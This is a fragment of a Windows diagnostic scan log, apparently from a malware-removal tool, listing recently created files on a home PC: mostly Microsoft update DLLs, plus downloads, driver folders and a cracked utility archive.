2018-10-10 00:58 - 2018-09-08 02:41 - 000258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2018-10-10 00:58 - 2018-09-08 02:40 - 001724928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2018-10-10 00:58 - 2018-09-08 02:40 - 000677888 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2018-10-10 00:58 - 2018-09-08 02:40 - 000593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
2018-10-10 00:58 - 2018-09-08 02:40 - 000522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2018-10-10 00:58 - 2018-09-08 02:40 - 000402944 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2018-10-10 00:58 - 2018-09-08 02:40 - 000249344 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthprops.cpl
2018-10-10 00:58 - 2018-09-08 02:39 - 005505024 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2018-10-10 00:58 - 2018-09-08 02:39 - 002052096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2018-10-10 00:58 - 2018-09-08 02:39 - 001787904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2018-10-10 00:58 - 2018-09-08 02:39 - 000615936 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2018-10-10 00:58 - 2018-09-08 02:38 - 001288192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2018-10-10 00:58 - 2018-09-08 02:38 - 001004544 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2018-10-10 00:58 - 2018-09-08 02:38 - 000986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2018-10-10 00:58 - 2018-09-08 02:38 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2018-10-10 00:58 - 2018-09-08 02:37 - 000091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcbuilder.exe
2018-10-10 00:58 - 2018-09-08 02:16 - 000482080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2018-10-10 00:58 - 2018-09-08 02:14 - 001328056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2018-10-10 00:58 - 2018-09-08 02:13 - 001626656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2018-10-10 00:58 - 2018-09-08 02:13 - 000181288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll
2018-10-10 00:58 - 2018-09-08 02:03 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\INETRES.dll
2018-10-10 00:58 - 2018-09-08 02:03 - 000059392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdBth.dll
2018-10-10 00:58 - 2018-09-08 02:02 - 000236032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll
2018-10-10 00:58 - 2018-09-08 02:00 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
2018-10-10 00:58 - 2018-09-08 01:59 - 001530368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2018-10-10 00:58 - 2018-09-08 01:59 - 001452544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2018-10-10 00:58 - 2018-09-08 01:59 - 000485376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2018-10-10 00:58 - 2018-09-08 01:59 - 000133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.XamlHost.dll
2018-10-10 00:58 - 2018-09-08 01:58 - 001308672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2018-10-10 00:58 - 2018-09-08 01:58 - 000897536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2018-10-10 00:58 - 2018-09-08 01:58 - 000775680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2018-10-10 00:58 - 2018-09-08 01:57 - 005391360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
2018-10-10 00:58 - 2018-09-08 01:57 - 000625664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2018-10-10 00:58 - 2018-09-08 01:57 - 000423936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2018-10-10 00:58 - 2018-09-08 01:57 - 000223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bthprops.cpl
2018-10-10 00:58 - 2018-09-08 01:56 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mcbuilder.exe
2018-10-10 00:58 - 2018-09-07 23:08 - 000462880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2018-10-10 00:58 - 2018-09-07 22:59 - 000433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2018-10-10 00:58 - 2018-09-07 22:59 - 000361544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2018-10-10 00:58 - 2018-09-07 22:58 - 000744976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2018-10-10 00:58 - 2018-09-07 22:58 - 000368440 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2018-10-10 00:58 - 2018-09-07 22:57 - 002571128 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2018-10-10 00:58 - 2018-09-07 22:57 - 001016984 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2018-10-10 00:58 - 2018-09-07 22:57 - 000930616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2018-10-10 00:58 - 2018-09-07 22:57 - 000482384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase_enclave.dll
2018-10-10 00:58 - 2018-09-07 22:57 - 000368448 _____ (Microsoft Corporation) C:\WINDOWS\system32\sechost.dll
2018-10-10 00:58 - 2018-09-07 22:51 - 000380728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2018-10-10 00:58 - 2018-09-07 22:45 - 000295416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2018-10-10 00:58 - 2018-09-07 22:45 - 000286824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
2018-10-10 00:58 - 2018-09-07 22:44 - 001980984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2018-10-10 00:58 - 2018-09-07 22:44 - 000829752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2018-10-10 00:58 - 2018-09-07 22:43 - 001174448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2018-10-10 00:58 - 2018-09-07 22:43 - 000269104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sechost.dll
2018-10-10 00:58 - 2018-09-07 22:32 - 000025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Dumpstorport.sys
2018-10-10 00:58 - 2018-09-07 22:31 - 000272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Proxy.dll
2018-10-10 00:58 - 2018-09-07 22:30 - 003601920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Service.dll
2018-10-10 00:58 - 2018-09-07 22:30 - 000189440 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2018-10-10 00:58 - 2018-09-07 22:30 - 000137728 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2018-10-10 00:58 - 2018-09-07 22:30 - 000115200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2018-10-10 00:58 - 2018-09-07 22:30 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2018-10-10 00:58 - 2018-09-07 22:29 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\HttpsDataSource.dll
2018-10-10 00:58 - 2018-09-07 22:29 - 000183808 _____ (Microsoft Corporation) C:\WINDOWS\system32\bthserv.dll
2018-10-10 00:58 - 2018-09-07 22:29 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000481280 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000473088 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000273408 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2018-10-10 00:58 - 2018-09-07 22:28 - 000153088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Proxy.dll
2018-10-10 00:58 - 2018-09-07 22:27 - 000983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2018-10-10 00:58 - 2018-09-07 22:27 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\winipcfile.dll
2018-10-10 00:58 - 2018-09-07 22:27 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityService.dll
2018-10-10 00:58 - 2018-09-07 22:27 - 000271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 002328064 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmsipc.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000784896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TileDataRepository.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000365568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000359424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winipcfile.dll
2018-10-10 00:58 - 2018-09-07 22:26 - 000142848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 003553792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 002789376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winipcsecproc.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 000466432 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 000415744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2018-10-10 00:58 - 2018-09-07 22:25 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Proximity.dll
2018-10-10 00:58 - 2018-09-07 22:24 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2018-10-10 00:58 - 2018-09-07 22:24 - 000845824 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2018-10-10 00:58 - 2018-09-07 22:24 - 000463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2018-10-10 00:58 - 2018-09-07 22:23 - 001655296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmsipc.dll
2018-10-10 00:58 - 2018-09-07 22:23 - 000807936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winipcsecproc.dll
2018-10-10 00:58 - 2018-09-07 22:23 - 000667136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2018-10-10 00:58 - 2018-09-07 22:23 - 000314368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Proximity.dll
2018-10-10 00:58 - 2018-09-07 22:22 - 000778240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2018-10-09 20:06 - 2018-10-09 20:06 - 000039543 _____ C:\Users\Christopher&Gabriell\Desktop\dds.txt
2018-10-09 20:06 - 2018-10-09 20:06 - 000011388 _____ C:\Users\Christopher&Gabriell\Desktop\attach.txt
2018-10-09 20:03 - 2018-10-09 20:03 - 000688992 ____R (Swearware) C:\Users\Christopher&Gabriell\Downloads\dds.scr
2018-10-07 01:52 - 2018-10-07 01:56 - 000391779 _____ C:\Users\Christopher&Gabriell\Desktop\bookmark.htm
2018-10-07 01:36 - 2018-10-07 01:36 - 000000218 _____ C:\Users\Christopher&Gabriell\Favorites.URL
2018-10-07 01:27 - 2018-10-07 01:03 - 000731316 _____ C:\Users\Christopher&Gabriell\Desktop\cookies.txt
2018-10-06 22:16 - 2018-10-06 22:16 - 000015679 _____ C:\Users\Christopher&Gabriell\Documents\Oct 1st.xlsx
2018-10-06 21:52 - 2018-10-06 21:52 - 048105224 _____ (Microsoft Corporation) C:\Users\Christopher&Gabriell\Downloads\Windows-KB890830-x64-V5.64.exe
2018-10-06 02:26 - 2018-10-06 02:26 - 001510832 _____ (Ruiware) C:\Users\Christopher&Gabriell\Downloads\wpsetup.exe
2018-10-04 02:15 - 2018-10-06 02:46 - 000000000 ____D C:\ProgramData\InstallMate
2018-10-04 02:15 - 2018-10-04 02:15 - 000000000 ____D C:\Program Files (x86)\Ruiware
2018-10-04 02:13 - 2018-10-04 02:13 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\WinPatrol PLUS v33.6.2015.18 Final + Keys [4realtorrentz]
2018-10-04 02:01 - 2018-10-04 02:01 - 001279026 _____ C:\Users\Christopher&Gabriell\Downloads\WinPatrol PLUS v33.6.2015.18 Final + Keys [4realtorrentz].zip
2018-10-01 06:19 - 2018-10-01 06:19 - 000690643 _____ C:\Users\Christopher&Gabriell\Documents\September_2018.pdf
2018-09-30 00:31 - 2018-09-30 00:31 - 000000000 ____D C:\WINDOWS\SysWOW64\wdegbma
2018-09-28 22:49 - 2018-09-28 22:49 - 000001134 _____ C:\Users\Christopher&Gabriell\Desktop\Snipping Tool.lnk
2018-09-28 22:49 - 2018-09-28 22:49 - 000001114 _____ C:\Users\Christopher&Gabriell\Desktop\Paint.lnk
2018-09-28 21:59 - 2018-10-01 07:26 - 000014750 _____ C:\Users\Christopher&Gabriell\Documents\9-2018.xlsx
2018-09-28 21:10 - 2018-09-28 21:10 - 000000000 ____D C:\Program Files (x86)\Microsoft ASP.NET
2018-09-28 14:23 - 2018-08-28 04:27 - 000097106 _____ C:\WINDOWS\uninstaller.dat
2018-09-27 23:42 - 2018-09-27 23:42 - 000001302 _____ C:\Users\Christopher&Gabriell\Desktop\Facebook Gameroom.lnk
2018-09-27 23:42 - 2018-09-27 23:42 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Facebook
2018-09-27 23:42 - 2018-09-27 23:42 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\Facebook
2018-09-27 23:42 - 2018-09-27 23:42 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\CEF
2018-09-25 01:22 - 2018-09-25 01:22 - 000000000 ____D C:\WINDOWS\Panther
2018-09-22 12:06 - 2018-09-22 12:06 - 000000000 ____D C:\Users\Public\CyberLink
2018-09-22 12:04 - 2018-09-22 12:04 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\Cyberlink
2018-09-20 05:13 - 2012-08-19 21:45 - 001821184 _____ (IDT, Inc.) C:\WINDOWS\system32\IDTNC64.cpl
2018-09-20 05:12 - 2018-09-20 05:13 - 000000000 ____D C:\Program Files\IDT
2018-09-20 05:12 - 2012-08-19 21:45 - 002188800 _____ (IDT, Inc.) C:\WINDOWS\system32\stapo64.dll
2018-09-20 05:12 - 2012-08-19 21:45 - 000671744 ____N (IDT, Inc.) C:\WINDOWS\system32\stapi64.dll
2018-09-20 05:12 - 2012-08-19 21:45 - 000542208 _____ (IDT, Inc.) C:\WINDOWS\system32\Drivers\stwrt64.sys
2018-09-20 05:12 - 2012-08-19 21:45 - 000499200 _____ (IDT, Inc.) C:\WINDOWS\system32\stcplx64.dll
2018-09-20 05:12 - 2012-08-19 21:45 - 000255488 _____ (IDT, Inc.) C:\WINDOWS\system32\st646425.dll
2018-09-20 03:42 - 2018-09-20 03:42 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\AppEx Networks
2018-09-20 03:42 - 2018-09-20 03:42 - 000000000 ____D C:\ProgramData\ATI
2018-09-20 03:37 - 2018-09-20 03:37 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Quick Stream
2018-09-20 03:37 - 2018-09-20 03:37 - 000000000 ____D C:\Program Files\AMD Quick Stream
2018-09-20 03:37 - 2018-09-20 03:37 - 000000000 ____D C:\Program Files (x86)\AMD AVT
2018-09-20 03:37 - 2014-08-08 01:31 - 000228032 _____ (AppEx Networks Corporation) C:\WINDOWS\system32\Drivers\appexDrv.sys
2018-09-20 03:36 - 2018-09-20 03:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2018-09-20 03:35 - 2018-09-20 03:36 - 000000000 ____D C:\Program Files\ATI Technologies
2018-09-20 03:23 - 2018-09-20 03:23 - 000000000 ____D C:\AMD
2018-09-20 02:10 - 2018-09-20 02:11 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\HP Downloads
2018-09-20 01:09 - 2018-09-20 01:09 - 000001416 _____ C:\Users\Christopher&Gabriell\Desktop\cpuz_x64.exe - Shortcut.lnk
2018-09-17 00:57 - 2018-09-20 03:10 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\Drivers for HP (8)
2018-09-17 00:53 - 2018-09-20 04:24 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\Drivers for hp (8.1)
2018-09-16 23:35 - 2018-09-16 23:35 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\cpu-z_1.86-en
2018-09-16 23:34 - 2018-09-16 23:34 - 002825318 _____ C:\Users\Christopher&Gabriell\Downloads\cpu-z_1.86-en.zip
2018-09-14 05:29 - 2018-09-14 06:09 - 000000000 ____D C:\T32768
2018-09-14 04:13 - 2018-09-14 04:13 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Roaming\AMD
2018-09-14 03:39 - 2018-09-20 01:24 - 000000000 ____D C:\ProgramData\Package Cache
2018-09-14 03:38 - 2018-09-14 03:38 - 000001313 _____ C:\Users\Public\Desktop\SiSoftware Sandra Lite Titanium.RTMa.lnk
2018-09-14 03:38 - 2018-09-14 03:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SiSoftware
2018-09-14 03:38 - 2018-09-14 03:38 - 000000000 ____D C:\Program Files\SiSoftware
2018-09-14 03:32 - 2018-09-14 03:32 - 114365488 _____ (SiSoftware ) C:\Users\Christopher&Gabriell\Downloads\san2818.exe
2018-09-14 03:29 - 2018-09-14 03:29 - 002193584 _____ ( ) C:\Users\Christopher&Gabriell\Downloads\SiSoftware_Sandra_Lite_28.18.2018.5.exe
2018-09-14 03:17 - 2018-09-16 23:21 - 017190912 _____ C:\Users\Christopher&Gabriell\AppData\Roaming\Sandra.mdb
2018-09-14 03:17 - 2018-09-14 03:19 - 000000574 _____ C:\Users\Christopher&Gabriell\Documents\Sandra.ini
2018-09-12 04:47 - 2018-08-30 22:15 - 003392512 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2018-09-12 04:47 - 2018-08-30 22:14 - 002700288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2018-09-12 04:47 - 2018-08-30 22:13 - 002738688 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2018-09-12 04:47 - 2018-08-30 22:11 - 001854976 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2018-09-12 04:47 - 2018-08-30 22:09 - 002258944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2018-09-12 04:47 - 2018-08-28 02:17 - 023862784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2018-09-12 04:47 - 2018-08-28 01:48 - 001274368 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2018-09-12 04:47 - 2018-08-09 04:32 - 004527680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2018-09-12 04:47 - 2018-08-09 04:31 - 001617728 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2018-09-12 04:47 - 2018-08-09 04:14 - 012709376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2018-09-12 04:47 - 2018-08-09 03:24 - 011901952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2018-09-12 04:47 - 2018-08-08 23:29 - 001620880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2018-09-12 04:47 - 2018-08-08 23:23 - 003148288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2018-09-12 04:47 - 2018-08-08 23:10 - 002893824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2018-09-12 04:46 - 2018-08-31 02:27 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll
2018-09-12 04:46 - 2018-08-31 02:27 - 000056320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf3216.dll
2018-09-12 04:46 - 2018-08-31 02:26 - 000101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bowser.sys
2018-09-12 04:46 - 2018-08-31 02:25 - 000270336 _____ (Microsoft Corporation) C:\WINDOWS\system32\spp.dll
2018-09-12 04:46 - 2018-08-31 02:25 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\rstrui.exe
2018-09-12 04:46 - 2018-08-31 02:24 - 001127936 _____ (Microsoft Corporation) C:\WINDOWS\system32\nettrace.dll
2018-09-12 04:46 - 2018-08-31 02:24 - 000482304 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
2018-09-12 04:46 - 2018-08-31 02:23 - 000765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2018-09-12 04:46 - 2018-08-31 02:22 - 001661440 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2018-09-12 04:46 - 2018-08-31 01:41 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll
2018-09-12 04:46 - 2018-08-31 01:41 - 000043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf3216.dll
2018-09-12 04:46 - 2018-08-31 01:40 - 000216576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\spp.dll
2018-09-12 04:46 - 2018-08-31 01:37 - 000622080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2018-09-12 04:46 - 2018-08-31 01:36 - 001469952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2018-09-12 04:46 - 2018-08-30 22:43 - 000722880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2018-09-12 04:46 - 2018-08-30 22:42 - 000632296 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpx.dll
2018-09-12 04:46 - 2018-08-30 22:42 - 000527328 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2018-09-12 04:46 - 2018-08-30 22:42 - 000155112 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2018-09-12 04:46 - 2018-08-30 22:28 - 000453104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpx.dll
2018-09-12 04:46 - 2018-08-30 22:28 - 000134936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2018-09-12 04:46 - 2018-08-30 22:17 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2018-09-12 04:46 - 2018-08-30 22:17 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\netevent.dll
2018-09-12 04:46 - 2018-08-30 22:15 - 000395776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Search.ProtocolHandler.MAPI2.dll
2018-09-12 04:46 - 2018-08-30 22:15 - 000075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mpsdrv.sys
2018-09-12 04:46 - 2018-08-30 22:14 - 000898560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2018-09-12 04:46 - 2018-08-30 22:13 - 000402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ks.sys
2018-09-12 04:46 - 2018-08-30 22:12 - 000736256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2018-09-12 04:46 - 2018-08-30 22:12 - 000020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netevent.dll
2018-09-12 04:46 - 2018-08-30 22:11 - 001057792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2018-09-12 04:46 - 2018-08-30 22:11 - 000796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2018-09-12 04:46 - 2018-08-30 22:11 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2018-09-12 04:46 - 2018-08-30 22:10 - 000889344 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2018-09-12 04:46 - 2018-08-30 22:10 - 000288768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2018-09-12 04:46 - 2018-08-30 22:10 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2018-09-12 04:46 - 2018-08-30 22:08 - 000619520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2018-09-12 04:46 - 2018-08-30 22:07 - 000856064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2018-09-12 04:46 - 2018-08-30 22:07 - 000735744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2018-09-12 04:46 - 2018-08-30 22:06 - 000345088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2018-09-12 04:46 - 2018-08-28 01:49 - 000677376 _____ (Microsoft Corporation) C:\WINDOWS\system32\HeadTrackerStorage.dll
2018-09-12 04:46 - 2018-08-28 01:45 - 000713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedRealitySvc.dll
2018-09-12 04:46 - 2018-08-13 21:14 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2018-09-12 04:46 - 2018-08-13 21:14 - 000340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2018-09-12 04:46 - 2018-08-09 04:31 - 000766872 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicensingWinRT.dll
2018-09-12 04:46 - 2018-08-09 04:31 - 000253544 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2018-09-12 04:46 - 2018-08-09 04:31 - 000236624 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2018-09-12 04:46 - 2018-08-09 04:17 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2018-09-12 04:46 - 2018-08-09 04:14 - 000466944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2018-09-12 04:46 - 2018-08-09 04:14 - 000326144 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnrollUI.dll
2018-09-12 04:46 - 2018-08-09 04:14 - 000158720 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll
2018-09-12 04:46 - 2018-08-09 04:13 - 000517120 _____ (Microsoft Corporation) C:\WINDOWS\system32\certreq.exe
2018-09-12 04:46 - 2018-08-09 04:13 - 000340992 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcGenral.dll
2018-09-12 04:46 - 2018-08-09 04:13 - 000223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\TtlsExt.dll
2018-09-12 04:46 - 2018-08-09 04:12 - 002084864 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2018-09-12 04:46 - 2018-08-09 04:12 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2018-09-12 04:46 - 2018-08-09 04:11 - 000181248 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2018-09-12 04:46 - 2018-08-09 04:10 - 001557504 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2018-09-12 04:46 - 2018-08-09 04:10 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
